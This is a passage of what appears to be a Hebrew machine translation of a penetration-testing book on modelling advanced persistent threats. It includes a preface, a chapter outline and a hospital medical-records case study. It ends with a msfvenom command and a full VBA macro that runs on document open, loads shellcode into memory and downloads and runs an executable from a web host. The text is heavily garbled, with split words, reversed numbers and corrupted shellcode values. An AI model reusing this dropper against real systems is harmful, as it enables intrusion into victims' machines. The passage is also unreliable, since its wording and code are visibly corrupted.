‫הני טר לייםיותר‪" ,‬תו קף" או " ש ח קן חיצוני"‪ ,‬כי כפי שת למד‪,‬י ש ד ברים הר בהיותר‬
‫גרועים ב חוץ מא שר אנר כי ס טים בני נוער עםיותר מדי זמן בידיים‪" .‬תור הזה ב" ש ל‬
‫ההא קינג שאנ טי‪-‬גי בוריו היו מאר ק א בנה‪ ,‬קווין פו ל סן‪ ,‬קווין מי טני ק וא חרים היה ת קופה‬
‫תמימה להפ ליא בה שוואה להיום‪ ,‬ש בה המציאות מוזרהיותר מ סיפורת ה סיי ברפאנ ק‬
‫ש ל שנות ה שמונים שנתנה ה שראה ל כ ל כך הר בה הא קרים ש ל היום‪.‬‬
‫ע ברו שנתיים עמו סות‪ .‬גי לויי סנודן זעזעו את העו לם והו בי לוי שירות ל שינויים נר ח בים‬
‫בי ח סה ש ל תע שיית ה ט כנו לוגיה ל בי ט חון‪ .‬ב‪ 3102-‬ניה לתי שי חה עם ל קו ח ש לא הייתה‬
‫עו לה ע ל הדעת לפני ההד לפות ‪ -‬שי חה ש בה ‪-NSA‬ההיה הנ ב ל שממנו רצו להיות‬
‫מוגנים‪ .‬זו הייתה ח ברת ‪ Fortune 500‬מ כו בדת בעו לם‪ ,‬לא הא ספ סוף‪ .‬גני בת קניין‬
‫רו חני נמצאת במגמת ע לייה ומתג ברת בהי קף‪ .‬במ סגרת ע בודתי אני נמצא בעמדה‬
‫יי חודית לומר בוודאות שהפיגועים שאתה שומע ע ליהם הם ר ק א לו שמוד לפים‬
‫לת ק שורת‪ .‬הם קצה ה קר חון בה שוואה לד ברים ש לא מדוו חים‪ .‬אני רואה את זה ע ל‬
‫ב סי סיומי‪ .‬לרוע המז ל ע בור תע שיית ה ט כנו לוגיה הר ח בהיותר‪ ,‬פריצה למער כות מ טרה‬
‫)ואני א כ לו ל כאן בדי קות חדירה‪ ,‬כ שהן מ בוצעות כה ל כה( היא הר בהיותר ק לה מא שר‬
‫ל שמור ע ל מער כות מאו ב ט חות מפני הת קפה‪ .‬הה בד ל בין מאו ב ט ח לפגיע הוא פ שו ט‬
‫כמו שאדם א חד ב ח ברה ש ל א לפים עו שה טעות א חת ק טנה‪.‬‬
‫ת ש כ ח מ כ ל מה שאתה חו ש ב שאתהיודע ע ליו‬

‫בדי קת חדירה‬
‫שום ד בר לא באמת ב טו ח‪ .‬אםי ש ל ק ח א חד ל ק חת‪ ,‬זה צריך להיות ש‪-‬תו קף נ חו ש‬
‫תמידיהיה ביתרון‪ ,‬ו)עם מע ט מאודיוצאי דופן( כ כ ל שהארגון גד ל‪ ,‬כך הוא הופך לא‬
‫ב טו חיותר‪.‬‬
‫י שיותר לנ טר‪,‬יותר נ קודות כני סה ויציאה‪ ,‬ג בו לות ביןי חידות ע ס קיות מ טו ש ט שים‪,‬‬
‫ו באופן ט בעיי שיותר מ שתמ שים‪ .‬כמו בן‪ ,‬זה לא אומר שאתה צריך לוותר ע ל הת קווה‪,‬‬
‫א ב ל המו שג " בי ט חון באמצעות ציות" אינו מ ספי ק‪.‬‬
‫למרות היתרונות ה ברורים ש ל סוג זה ש ל בדי קות הו לי ס טיות או בהי קף פתו ח‪ ,‬היא‬
‫מ בוצעת ר ק לעתים נדירות בעו לם האמיתי‪ ,‬לפ חות בה שוואה ל בדי קות חדירה‬
‫מ סורתיות‪ .‬ה סי בה ל כך היא כפו לה‪ :‬זה נתפ ס כי קריותר )זה לא( וארגונים ר ק לעתים‬
‫ר חו קות רוצים רמת בדי קה כזו‪ .‬הם רוצים לע שות מ ספי ק כדי לציית למדיניות הא ב ט חה‬
‫ש להם ו לדרי שות ה חו קיות ש להם‪ .‬אתה שומע מונ חים כמו ‪HIPAA, SOX‬או תואמי ‪PCI‬‬
‫דרי שות ה חו ק‪ .‬אתה שומע מונ חים כמו ‪HIPAA-, SOX-,‬או ‪PCI-‬תואמי ‪ PCI,‬מתנדנדים‬
‫ע לידי ספ קים כאי לו הם מת כוונים למ שהו‪ ,‬א ב ל הם קיימים ר ק כדי ל שמור ע ל עור כי‬
‫דין מאו שרים ומ ש למים הי ט ב וזו ח בי לה ש ק ל למ כור‪ .‬אתהי כו ל להיות תואם ‪ PCI‬ו להיות‬
‫פגיע לעזאז ל‪ .‬ת שא לו את ‪TJ Maxx‬או ‪ Sony:‬ל ק ח את ה שנים ה קודמות ל ש חזר את‬
‫אמון המותג; כמות הנתונים העצומה שד לפה פירו שה שהנז ק לא חרון עדיין נמצא‬
‫בהער כה‪ .‬די לומר שמנ ט ליות ציות מזי קה ל בי ט חון ש לך‪ .‬אני באמת מ ביא את הנ קודה‬
‫ה ביתה כאן כי אני רוצה לוודא שזה מו בן במ לואו‪ .‬עמידה במדיניות א ב ט חה והיות‬
‫מאו ב ט ח אינם אותו ד בר‪.‬‬
‫איך ה ספר הזה מאורגן‬

‫ב ספר הזה‪ ,‬כאמור‪ ,‬אני הו לך ל ב חון את דוגמנות ‪ APT‬בעו לם האמיתי‪ ,‬א ב ל אני גם הו לך‬
‫קצתיותר מזה‪ .‬אציג מ סגרת בדי קת ‪ APT‬עו בדת ו ב כ ל פר ק או סיף ש כ בה נו ספת ש ל‬
‫פונ קציונ ליות לפי הצורך כדי לפתור בעיות שונות ו ליי שם את התוצאה ע ל ס בי בות היעד‬
‫בדיון‪ .‬ב כך‪ ,‬אהיה לגמרי קוד אגנו ס טית במידת האפ שר; עם זאת‪,‬ידע מוצ ק בת כנות‬
‫חיוני מ כיוון שתידר ש ליצור כ לים מ ש לך ‪ -‬לפעמים ב שפות שאינך מ כיר‪.‬‬
‫כ ל א חד מהפר קים ש ל ספר זה דן בני סיון ש לי בדוגמנות ‪ APT‬מו ל תע שיות ספציפיות‪.‬‬

‫כ כזה‪ ,‬כ ל פר ק מציג מו שגים חד שים‪ ,‬רעיונות חד שים ו ל ק חים שאפ שר ל ק חת‪ .‬אני מאמין‬
‫ש ח שו ב ל ח ל ק את הע בודה הזו לפי תע שיה כ ס בי בות‪ ,‬עמדות לא ב ט חה‪ ,‬וא כן כ שירותם‬
‫ש ל א לה שמ בצעים הגנה ע ל ר שת מ שתנה מאוד בין מגזרים שונים‪ .‬אם אתה בוד ק‬
‫ע טים‪ ,‬ת למד מ שהו‪ .‬אםי ש לך את המ שימה ח סרת ה קנאה ש ל להר חי ק פו ל שים‬
‫ממער כת הארגון ש לך‪ ,‬ת למד ד ברים שי שאירו אותך ער ב לי לה א ב ל גםיראו לך איך‬
‫ל בנות הגנות גמי שותיותר‪.‬‬
‫במ קום להתיי ח ס לנו שא כמדריך ט כניי ב ש‪ ,‬כ ל פר ק עו ק ב א חר פורמ ט דומה ‪-‬הה ק שר‬
‫ש ל מגוון ר ח ב ש ל תע שיות נפרדותיהיה הר קע שע ליו נ ח קרות ט כנו לוגיות‪ ,‬הת קפות‬
‫ונו שאים חד שים‪ .‬זה כו ל ל לא ר ק ו ק טורים מוצ ל חים ש ל הת קפה א לא מו שגים חיוניים‬
‫כמו ה ס למה ש ל הר שאות‪ ,‬הימנעות מזיהוי תו כנות זדוניות‪ ,‬מודעות למצ ב‪ ,‬תנועה‬
‫לרו ח ב ועוד מיומנויות ר בות שהן קרי טיות לה בנה מוצ ל חת הן ש ל ‪ APT‬והן ש ל אופן‬
‫המוד ל ש לה‪ .‬המ טרה היא לא ר ק ל ספ ק או סף ש ל קוד ות סרי טים‪ ,‬אם כי מו באות‬
‫דוגמאות ר בות‪ ,‬א לא לעודד ה בנה ר ח בה ואורגנית ש ל ה בעיות ופתרונותיהן‪ ,‬כך‬
‫שה קוראיםי ח ש בו ע ליהן בדר כים חד שות ויו כ לו לה בין ב בי ט חון‪ .‬לפת ח כ לים מ ש להם‪.‬‬
‫פר ק ‪"1,‬ר שומות רפואיות ) ב(א ב ט חה"‪ ,‬דן בהת קפות ע ל ת שתית בתי חו לים עם‬
‫מו שגים כמו הת קפות מא קרו ו ט כני קות אדם בדפדפן‪ .‬נ ח קר מ בוא לפי קוד ו ב קרה‬
‫‪(C2).‬‬
‫פר ק ‪"2,‬גני בת מ ח קר"‪,‬י ח קור הת קפות באמצעותיי שומוני ‪ Java‬ו‪ 2C-‬מת קדמים‬
‫יותר בה ק שר ש ל הת קפה נגד אוני בר סי טת מ ח קר‪.‬‬
‫פר ק ‪ "3,‬שוד ש ל המאה הע שרים וא חת"‪ ,‬בו חן דר כים ל חדור ליעדים בע לי א ב ט חה‬
‫ג בוהה כגון בנ קים ו ט כני קות ‪ C2‬מת קדמות ביותר באמצעות פרו טו קו ל ‪DNS.‬‬
‫פר ק ‪"4,‬פארמה קארמה"‪ ,‬בו חן הת קפה נגד ח ברת תרופות וע ל ר קע זה מציג‬

‫ניצו לים בצד ה ל קו ח ו שי לו ב מ סגרות ש ל צד ש לי שי כגון ‪ Metasploit‬ב‪ 2C-‬ש לך‪.‬‬
‫פר ק ‪"5,‬רו בים ות חמו שת"‪ ,‬בו חן הדמיית תו כנות כופר ו שימו ש ב שירותים נ סתרים‬
‫ש ל ‪ Tor‬כדי לה סוות את המי קום הפיזי ש ל ת שתית ‪C2.‬‬
‫פר ק ‪"6,‬מודיעין פ לי לי"‪ ,‬מ שתמ ש בר קע ש ל חדירה למפ קדת מ ש טרה כדי להמ חי ש‬
‫את ה שימו ש ב קופ סאות " קריפר" להת ק שרויות ארו כות טוו ח ש בהן אפ שרית גי שה‬
‫פיזית זמנית‪ .‬מו שגים א חרים כמו ה ס למה ש ל הר שאות ופרי סה ש ל הת קפות‬
‫באמצעותיי שומי ‪ HTML‬מוצגים‪.‬‬
‫פר ק ‪"7,‬מ ש ח קי מ ל חמה"‪ ,‬דן בהת קפה נגד ר שת נתונים מ סווגת ומ ס ביר מו שגים‬
‫כמו אי סוף מודיעין ב קוד פתו ח ומו שגים מת קדמים ב‪& Control. dnammoC-‬‬
‫פר ק ‪"8,‬פריצת עיתונאים"‪ ,‬מראה כיצד לת קוף מוציא לאור ו לה שתמ ש נגדם‬
‫ב ט כנו לוגיות ו בזרימות הע בודה ש לו‪ .‬תו כן מדיה ע שירה מתפת ח ומתודו לוגיות‬
‫ני סיוניות ש ל ‪C2‬נ ל ק חות ב ח ש בון‪ .‬מוצגים מו שגים מת קדמים בהנד סה ח ברתית‪.‬‬
‫פר ק ‪ "9,‬ח שיפה צפונית"‪ ,‬הוא הת קפה היפות טית נגד מדינה נו כ לת עוינת ע לידי‬
‫צוות ממ ש לתי למ בצעי גי שה מותאמת ‪(TAO).‬צפון קוריאה מ שמ שת דוגמה נו חה‪.‬‬
‫אנו דנים במיפוי ר שת די ס קר טי מת קדם ו באמצעים לת קיפת סמאר טפונים‪ ,‬כו ל ל‬
‫יצירת קוד עוין ע בור ט לפונים ‪ iOS‬ואנדרואיד‪.‬‬
‫אז‪ ,‬ב לי די בורים נו ספים ‪-‬המ שי כו עם התו כנית‪.‬‬

‫פר ק ‪)1‬אי( א ב ט חה ש ל ר שומות רפואיות פר ק רא שון זה מראה כיצד ניתן‬

‫לה שתמ ש במת קפות הפ שו טות ביותר כדי ל ס כן את הנתונים המאו ב ט חים‬
‫ביותר‪ ,‬מה שהופך אותו למ קום הגיוני להת חי ל בו‪ ,‬במיו חד מ כיוון שא ב ט חת‬
‫הנתונים הרפואיים היא כ בר זמן ר ב נו שא שנמ שך‪-CIO .‬ה ש ל בתי ה חו לים‬
‫ערים ב לי לה‪.‬‬
‫ת קרית " קיין"‪.‬‬
‫גני בה או אפי לו שינוי ש ל נתוני המ טופ לים היו איום מתמ שך הר בה לפני שההו לנדי‬
‫" קיין" התפ שר ע ל המר כז הרפואי ש ל אוני בר סי טת וו שינג טון ב שנת ‪ 2000.‬בית‬
‫ה חו לים באותה ת קופה האמין שהם הצ לי חו לזהות ונית קו את הת קיפה‪ ,‬אמונה‬
‫שהם לא התע ל לו ממנה בג סות שי שה חוד שים לא חר מ כן‪ ,‬כא שר קיין שיתף את‬
‫הנתונים ש ל ק ח עם עיתונאי 'מו קד הא ב ט חה' קווין פו ל סן‪ ,‬שפר סם לא חר מ כן‬
‫מאמר המתאר את המת קפה וה ש ל כותיה‪ .‬זה הפך במהירות ל חד שות עו למיות‪.‬‬
‫קיין הצ לי ח להי שאר מו סתר בר שתות המר כז הרפואי ב כך שאפ שר ל קור בנותיו‬
‫להאמין שגיר שו אותו‪ .‬הוא ע שה זאת ע לידי ה שארת טרויאנים לגי שה מר חו ק ש ל‬
‫‪ )BO2K‬כ לי שפות ח ע לידי ק בוצת ההא קרים‪ "Cult of the Dead Cow" ,‬ופופו לרי‬
‫ב ס בי בות ת חי לת המאה( ב כמה מה שרתים שנפגעו בזמן שת שתית הפי קוד וה ב קרה‬
‫ש לו הייתה קצתיותר די ס קר טי‪ .‬הפר ק כו לו מתועד הי ט ב באינ טרנ ט ואני מציע לך‬
‫ל קרוא ע ליו‪ ,‬מ כיוון שהוא גם דוגמה מצוינת ל‪ TPA-‬מודרני מו קדם וגם מ קרה ש ל‬
‫ספרי לימוד כיצד לא להתמודד עם חדירה ‪ -‬פרוצדור לית ופומ בית‪.‬‬
‫ראה את המאמר המ קורי ב כתו בת ‪http://www.securityfocus.com/news/122‬‬
‫מ בוא ל סימו לציה מת קדמת‬

‫איום מתמ שך‬
‫מוד ל איומי ‪APT‬הוא ענף ספציפי ש ל בדי קות חדירה ש בו הת קפות נו טות להיות‬
‫ממו קדות במ שתמ שי קצה כדי לה שיג פ שרה רא שונית בר שת במ קום לת קוף מער כות‬
‫חיצוניות כגוןיי שומי אינ טרנ ט או ת שתית ר שת הפונה לאינ טרנ ט‪ .‬כתרגי ל‪ ,‬הוא נו טה‬
‫להת בצע ב שתי פרדיגמות עי קריות‪-‬‬
‫ַת ׁשתִית‪ .‬כתרגי ל‪ ,‬הוא נו טה להת בצע ב שתי פרדיגמות עי קריות ‪ -‬מניעה‪ ,‬כ לומר‪ ,‬כ ח ל ק‬
‫מיוזמת בדי קת חדירה‪ ,‬או נתי חה ש לא חר המוות‪ ,‬ע ל מנת לה ש לים תגו בה מ שפ טית‬
‫לא חר ת קרית כדי לה בין כיצדי כו ל היה פו ל ש לה שיג גי שה ‪ .‬הרו ב המ כריע הוא‬
‫מהרא שונים‪ .‬הת ק שרויות ‪APT‬י כו לות להת בצע כתרגי לים קצרי טוו ח הנמ ש כים מ ספר‬
‫ש בועות או ע ל פני ת קופה ארו כה ש ל זמן‪ ,‬מ חוי בת ב שעה ביום למ שך מ ספר חוד שים‪.‬‬
‫י ש חי לו קי דעות לג בי איזו א ס טר טגיהיעי להיותר )ו כמו בן שזה ת לוי באופי היעד(‪ .‬מצד‬
‫א חד‪ ,‬פר ק זמן ארוךיותר מאפ שר למידו ל ל ח קות מת קפה אמיתית בצורה מדוי קתיותר‪,‬‬
‫אך מצד שני‪ ,‬ל קו חות נו טים לרצות עד כונים שו טפים כא שר ה בדי קה מת בצעת בצורה‬
‫זו‪ ,‬והוא נו טה לה בי ס את מ טרת ה בדי קה כא שר אתה מנות ק ב כ ל מ שו כה‪.‬‬
‫גי שות שונותיי ב חנו לאורך ספר זה‪.‬‬
‫בית חו לים ב לונדון נפגע ע לידי גורמים לאידועים‪.‬‬
‫זה היה ה ס כום ה כו ל ל ש ל מה שידעתי כ שהגעתי ל קמפו ס ה ל בנים האדומות כדי לדון‬
‫בפ שרה ו להמ ליץ ע ל הפעו לות ה באות‪ .‬א חרי הי כרות ו קפה מ כונות רע הרגי ל ש בדרך‬
‫כ ל ל מ לווה פגי שות כא לה‪ ,‬הגענו ל ל ב העניין‪ .‬המאר ח ש לנו אמר ב סתירה ש קיימת‬
‫"אנומ ליה במער כת רי שומי תרופות המר שם"‪ .‬לא הייתי ב טו ח מה לע שות עם זה‪" ,‬זה‬
‫היה עניין ש ל א חות ג' קי ?" שא לתי‪ .‬ז כיתי במ ב ט שאומר "אתה לא מצ חי ק ואני לא צופה‬
‫ב שואו טיים"‪ .‬היא המ שי כה‪" ,‬גי לינו שנוצרו מ ספר ר שומות מזויפות ש ל חו לים ש שימ שו‬
‫לא חר מ כן לה שגת תרופות מ בו קרות"‪.‬‬
‫כן‪ .‬בה ח ל ט הייתי מאפיין את זה כאנומ ליה‪.‬‬

‫די ברנו ע ל ההת קפה וע ל מער כת רי שום המ טופ לים ‪-‬היתרונות וה ח סרונות ש לה ‪-‬‬
‫ו באופן ב לתי נמנע‪ ,‬הת ברר שההת קפות התר ח שו בע ק בות כונן להע ביר את הנתונים‬
‫לענן‪ .‬בית ה חו לים ה טמיע פתרון מפת ח ש ל ח ברה ב שם ‪Pharmattix.‬זו הייתה מער כת‬
‫שהו ש קה ב בתי חו לים בר ח בי הארץ כדי לייע ל את מתן שירותי ה בריאות במוד ל מנוי‬
‫ח ס כוני‪.‬‬
‫למע שה‪ ,‬ה ט כנו לוגיה נראתה כמו איור ‪1.1.‬‬

‫איור ‪1.1:‬זרימת ר שת ‪Pharmattix‬‬

‫למער כת היו אר בעה מ ח ל קות ש ל מ שתמ שים )ראה איור ‪1.2):‬‬
‫איור ‪1.2:‬תפ קידי מ שתמ ש‬
‫הרופא רו שם את התרופות‬
‫בית המר ק חת מ ח ל ק את התרופות‬
‫ה חו לים עצמם‬
‫ה קצה האדמיני ס טר טי בי ל כ ל מ שימות שונות א חרות‬
‫תמיד טו ב ל ברר מהי ש ל ספ ק עצמו לומר כדי שתדע איזו פונ קציונ ליות מ ספ קת‬
‫התו כנה‪.‬‬
‫חומר שיוו ק ‪PHARMATTIX‬‬
‫אנו מג בירים את הנגי שות ואת הפרודו ק טי ביות ש ל התרגו ל ש לך‪.‬‬

‫אנוי כו לים ל ספ ק אתר מ קצועי עם מידע רפואי ו טפ סים שונים המציעים למ טופ לים‬
‫ש לך שירות נו סף ל לא ת קורה כ ספית נו ספת‪ .‬אנ חנוי כו לים ל ספ ק את כ ל‬
‫הפונ קציונ ליות ש ל מער כת הר שומות הרפואיות הנו כ חיות ש לך וי כו לים ליי בא את‬
‫הר שומות ש לך ו ל ספ ק פתרון עו בד‪,‬‬
‫מער כת ר שומות וי כו לה ליי בא את הר שומות ש לך ו ל ספ ק פתרון עו בד‪ ,‬פעמים‬

‫ר בות תוךיום ע בודה א חד‪.‬‬
‫ה שירות המ לא ש לנו מ ק ל ע ליך כרופא לת חז ק את האתר ש לך‪.‬‬
‫פתרון ‪ Pharmattix Doctor Online‬ש לך מציע אתר אינ טרנ ט המאפ שר לך‬
‫ליידע את המ טופ לים וי כו ל להציע שירותים נו ספים‪ ,‬תוך חי ס כון בזמן‪.‬‬
‫ה ק ל ע ל התרגו ל וניהו ל המ טופ לים ש לך עםייעוץ א ל ק טרוני ואינ טגרציה עם‬
‫‪-HIS‬ה ש לך!‬
‫לי כו לות האתר ש לך‪:‬‬
‫ס בי בת ניהו ל מ ש לו •דפים בודדים כמ ס לו ל צוות‪ ,‬פגי שות ו כו' • שעות ע בודה •‬
‫ע לונים ומ כת בים למ טופ לים • ‪ NHG‬שי לו ב • ‪ MS Office‬מידע רפואי • מידע‬
‫לנו סעים ו חי סונים • טפ סים שונים )הר שמה‪ ,‬מר שמים חוזרים‪ ,‬שא לות( •ייעוץ‬
‫א ל ק טרוני •יומן אינ טרנ ט מ קוון • קי שור לאתר עם מער כת המידע ש ל רופא‬
‫המ שפ חה ש לך • )‪(HIS‬תמי כה חינם ‪ -Help Desk‬בייעוץ א ל ק טרוני ו שי לו ב ‪HIS:‬‬
‫רוצה לת ק שר ב ס בי בה מאו ב ט חת עם המ טופ לים ש לך? באמצעותייעוץ‬
‫א ל ק טרוני אתהי כו ל‪ .‬אתהי כו ל להג ביר את הנגי שות ש ל התרגו ל ש לך מ ב לי‬
‫לא בד ש לי טה‪ .‬אפ שר גם ל ק שר את ‪-HIS‬ה ש לך לאתר התרגו ל‪ ,‬מה שמאפ שר‬
‫למ טופ לים ל ק בוע פגי שות מ קוונות ו ל ב ק ש טיפו ל תרופתי חוזר‪ .‬ל לא התער בות‬
‫ה סייעת!‬
‫למידע נו סף‪ ,‬אנא א ל תה ס ס לפנות א לינו!‬
‫המ טרה ש לי בתור בוד ק חדירה תהיה למ קד את א חד מעו בדי בית ה חו לים ע ל מנת‬
‫לערער את מער כת רי שומי ה חו לים‪ .‬הגיוני למ קד את הרופאים עצמם‪ ,‬ש כן תפ קידם‬
‫במער כת מאפ שר להם להו סיף חו לים ו לר שום תרופות‪ ,‬וזה בעצם מה שאנ חנו רוצים‬
‫לע שות‪ .‬אנויודעים מה ספרות ה ט כנו לוגית שהוא מ שת ל ב עם ‪ MS Office,‬ו בהת ח ש ב‬
‫באופי הפתו חה ש ל ה ס בי בה שאנו נת קוף‪ ,‬זה נ שמע כמו מ קום מצוין להת חי ל בו‪.‬‬
‫כ ש ברו ס שנייר מד בר‪ ,‬זה א‬

‫רעיון טו ב לה ק שי ב‬
‫"אימות דו‪ -‬ש ל בי אינו המו שיע ש לנו‪ .‬זה לאיגן מפני פי שינג‪.‬‬
‫זה לאימנע גני בת זהות‪ .‬זה לא הו לך לא ב ט ח ח ש בונות מ קוונים מפני ע ס קאות‬
‫הונאה‪ .‬זה פותר את בעיות הא ב ט חה שהיו לנו לפני ‪ 10‬שנים‪ ,‬לא את בעיות‬
‫הא ב ט חה שי ש לנו היום"‪.‬‬
‫היו לפני ‪ 10‬שנים‪ ,‬לא בעיות הא ב ט חה שי ש לנו היום"‪.‬‬

‫ברו ס שנייר‬
‫כ ל תפ קיד מ שתמ ש ה שתמ ש באימות דו‪-‬גורמי; כ לומר‪ ,‬בנו סף ל שם מ שתמ ש או‬

‫כר טי ס‪ ,‬נדר שו עו בדי בית ה חו לים לה חזי ק ב כר טי ס גי שה‪.‬‬
‫המ טופ לים קי ב לו גם סי סמה חד פעמית באמצעות ‪SMS‬או דואר א ל ק טרוני בזמן ה כני סה‪.‬‬
‫נו שא ש חוזר ע ל עצמו ב כ ל פר קיהיה הצגת אמצעי חד ש להע ברת מ טענים ו כן להציע‬
‫שיפורים לת שתית הפי קוד וה ב קרה‪ .‬עם זאת ב ח ש בון‪ ,‬האמצעי הרא שון להע ברת‬
‫מ טען שאני רוצה לדון בו הוא גם א חד הוותי קים והיעי לים ביותר‪.‬‬
‫מ ש לו ח מ טען ח ל ק ‪ 1:‬למד כיצד לה שתמ ש במא קרו ‪VBA‬‬
‫)‪VBA (Visual Basic for Applications‬היא ק בוצת מ שנה ש ל שפת הת כנות ה קניינית‬
‫ש ל ‪Microsoft Visual Basic.‬הוא נועד לפעו ל אך ור ק בתוך ‪-Excel‬ו ‪Microsoft Word‬‬
‫ע ל מנת להפוך פעו לות חוזרות לאו טומ טיות ו ליצור פ קודות מותאמות אי שית או כפתורי‬
‫סרג ל כ לים‪ .‬זוהי שפה פרימי טי בית כ כ ל שהד ברים הא לה הו ל כים‪ ,‬א ב ל היא מ סוג לת‬
‫ליי בא ספריות חיצוניות כו ל ל כ ל ‪-API‬ה ש ל ‪ Windows.‬כ כזה אנ חנוי כו לים לע שות איתו‬
‫הר בה מ ל בד לנהוג בגי ליונות א ל ק טרוניים ו לנה ל ר שימות דיוור‪.‬‬
‫למא קרו ‪VBA‬י ש הי ס טוריה ארו כה כאמצעי להע ברת תו כנות זדוניות‪ ,‬א ב ל זה לא אומר‬
‫שהוא פ חותיעי ל היום ממה שהיה אי פעם‪ .‬להיפך‪ ,‬בגר סאות מודרניות ש ל ‪(2010‬‬
‫‪ Microsoft Office‬ואי לך(‪ ,‬התנהגות ברירת המ חד ל ש ל האפ לי קציה היא לא לע שות‬
‫ה ב חנה בין קוד חתום ל קוד לא חתום‪.‬י ש ל כך שתי סי בות‪ .‬הרא שון הוא ש חתימת קוד‬
‫יעי לה בערך כמו רי קודי ג שם כאמצעי ל ח סימת קוד עוין ומ כיוון ש למי קרו סופ ט נמא ס‬
‫להזהיר אנ שים מפני ה ס כנות ש ב שימו ש ב ט כנו לוגיות ה לי בה ש לה‪.‬‬
‫במ קרה זה‪ ,‬אנו רוצים ליצור ש ל ב שמ בצע מ טען כא שר היעד פות ח את מ סמך ‪Word‬‬
‫או ‪Excel.‬י שנן מ ספר דר כים ש בהן נו כ ל לה שיג זאת‪ ,‬אך רא שית אני רוצה לגעת ב קוד‬
‫לדוגמה שנוצר ע לידי ‪-Metasploit framework‬ה מתו קף ה כ לי ‪ msfvenom‬ש לה ‪.‬‬
‫ה סי בה היא פ שו ט כי זו דוגמה מו ש למת לאיך לא לע שות זאת‪.‬‬
‫כיצד לא ל ביים הת קפת ‪ VBA‬מ טרת ‪msfvenom‬היא ליצור מ טענים מ קודדים או‬
‫‪shellcode‬המ סוג לים להת בצע במגוון ר ח ב ש ל פ ל טפורמות ‪-‬א לו הם בדרך כ ל ל‬
‫ה סו כנים ש ל ‪ Metasploit‬עצמו‪ ,‬אם כיי שנן אפ שרויות ל טפ ל ב קוד ש ל צד ש לי שי‪ ,‬כגון‬
‫טרויאני קו בצי הפע לה קיימים ו כן ה לאה‪ .‬נד בר מאו חריותר ע ל המ טפ לים ש ל‬
‫‪Metasploit,‬ה חוז קות וה חו ל שות ש להם‪ ,‬א ב ל לעת עתה בואו נ שאיר ד ברים כ ל ליים‪.‬‬
‫אפ שרות א חת ‪ -msfvenom‬ש מ ספ קת היא להוציא את המ טען המת ק ב ל כ קוד מע טפת‬
‫מ קודד ע שרוני בתוך ס קריפ ט ‪ VBA‬שניתן ליי באי שירות למ סמך ש ל ‪Microsoft Office‬‬
‫)ראה רי שום ‪ 1-1).‬שורת הפ קודה ה באה תיצור ס קריפ ט ‪ VBA‬שיוריד וי בצע קו בץ‬
‫הפע לה ש ל ‪ Windows‬מ כתו בת אתר אינ טרנ ט‪:‬‬
‫ שנוצר ע לידי‬VBA ‫ קוד מא קרו‬1-1 ‫ר שימה ש ל‬

msfvenom
ga-nai -i 5 -a x86 --platform Windows EXE=c:\temp\payload.exe URL=http://www.wherever

429 :moc. ‫ גוד ל מ טען‬root@wil:~# msfvenom -p windows/download_exec -f vba -e shikata
‫בתים‬
‫אז‬Vba7 ‫אם‬#
CreateThread Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe

(ByVal Zdz As Long, ByVal Tfnsv As Long, ByVal Kyfde As LongPtr,
Spjyjr As Long, ByVal Pcxhytlle As Long, Coupxdxe As Long) As
LongPtr
VirtualAlloc Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe
(ByVal Hflhigyw As Long, ByVal Zeruom As Long, ByVal Rlzbwy As
Long, ByVal Dcdtyekv As Long) As LongPtr
RtlMoveMemory Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe
(ByVal Kojhgx As LongPtr, ByRef Und As Any, ByVal Issacgbu As
LongPtr ‫ארוך( כמו‬
#Else Private Declare Function CreateThread Lib "kernel32"
(ByVal Zdz As Long, ByVal Tfnsv As Long, ByVal Kyfde As Long,
Spjyjr As Long, ByVal Pcxhytlle As Long, Coupxdxe As Long) As
‫ארוך‬
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal
Hflhigyw As Long, ByVal Zeruom As Long, ByVal Rlzbwy As Long,
ByVal Dcdtyekv As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal
Kojhgx As Long, ByRef Und As Any, ByVal Issacgbu As Long) As
‫ארוך‬
#EndIf
Sub Auto_Open()
Dim Hdhskh As Long, Wizksxyu As Variant, Rxnffhltx As Long
‫אז‬Vba7 ‫אם‬#
Dim Qgsztm As LongPtr, Svfb As LongPtr
‫אַ ֵח ר‬#
‫א ס לונג‬Svfb ,‫דים קג ס טם א ס לונג‬
#EndIf
Wizksxyu =
Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207,
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1,
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,
235,134,93,104,110,101,116,0,104,119,105,110,105,137,230,84,104,76,119,38,
7,255,213,49,255,87,87,87,87,86,104,58,86,121,167,255,213,235,96,91,
49,201,81,81,106,3,81,81,106,80,83,80,104,87,137,159,198,255,213,235,
4,80,106,31,
5,213,137,198,106,16,912,104,106,16,912,104,137,198,106,16,912,104,106,16,912,104,106,16,912,104,106,16,912,104
86,104,117,70,158,134,255,213,49,255,87,87,87,87,86,104,45,6,24,123,
255,213,133,192,117,20,75,15,132,113,0,0,0,235,209,233,131,0,0,0,
232,172,255,255,255,0,235,107,49,192,95,80,106,2,106,2,80,106,2,106,
2,87,104,218,246,218,79,255,213,147,49,192,102,184,4,3,41,196,84,141,
76,36,8,49,192,180,3,80,81,86,104,18,150,137,226,255,213,133,192,116,
45,88,133,192,116,22,106,0,84,80,141,68,36,12,80,83,104,45,87,174,
91,255,213,131,236,4,235,206,83,104,198,150,135,82,255,213,106,0,87,104,
49,139,111,135,255,213,106,0,104,240,181,162,86,255,213,232,144,255,255,255,
99,58,100,97,118,101,46,101,120,101,0,232,19,255,255,255,119,119,119,46,
98,111,98,46,99,111,109,0)
Qgsztm = VirtualAlloc(0, UBound(Wizksxyu), &H1000, &H40)

Rxnffhltx = LBound(Wizksxyu) To UBound(Wizksxyu) Hdhskh = ‫ע בור‬
‫)‪Wizksxyu(Rxnffhltx‬‬
‫)‪Svfb = RtlMoveMemory(Qgsztm + Rxnffhltx, Hdhskh, 1‬‬
‫ה בא ‪Rxnffhltx‬‬
‫)‪Svfb = CreateThread(0, 0, Qgsztm, 0, 0, 0‬‬
‫סיום מ שנה‬
